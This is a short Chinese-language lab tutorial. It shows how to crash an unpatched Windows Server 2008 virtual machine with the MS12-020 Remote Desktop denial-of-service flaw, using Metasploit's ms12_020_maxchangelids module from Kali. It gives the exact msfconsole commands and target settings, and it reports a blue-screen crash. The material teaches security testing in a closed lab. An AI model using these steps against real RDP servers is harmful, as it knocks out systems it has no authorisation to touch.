实验环境：

攻击机kali IP：192.168.32.128

靶机windows server 2008 IP：192.168.32.132

1、了解windows server2008虚拟机的基本信息检查是否安装有关该漏洞的补丁

使用systeminfo命令查看：

通过该页面可知：虚拟机win server2008没有安装任何补丁。

2、MS12-020漏洞攻击准备工作：

（1）windows server 2008需要开启远程桌面：

（2）获取靶机windows server 2008的IP，使用ipconfig命令：

（3）确保攻击机kali与靶机win server 2008可以ping通

3、使用msfconsole工具进行攻击。

（注：msfconsole工具可在Windows下载安装使用，kali自带此工具所以无需下载）

（1）攻击机kali开启msfconsole工具，使用命令：msfconsole

（2）搜索MS12-020漏洞可以使用的模块:msf6>search ms12-020

（3）使用use命令选定要利用的模块，这里选择0模块:

msf6>use auxiliary/dos/windows/rdp/ms12_020_maxchangelids

（4）查看需要填写的参数:

>show options

（5）建立目标地址，设置靶机（win server 2008）IP:

>set RHOSTS 192.168.32.132

（6）使用run命令运行模块:>run

 

实验结果：靶机win server 2008被远程操控而蓝屏。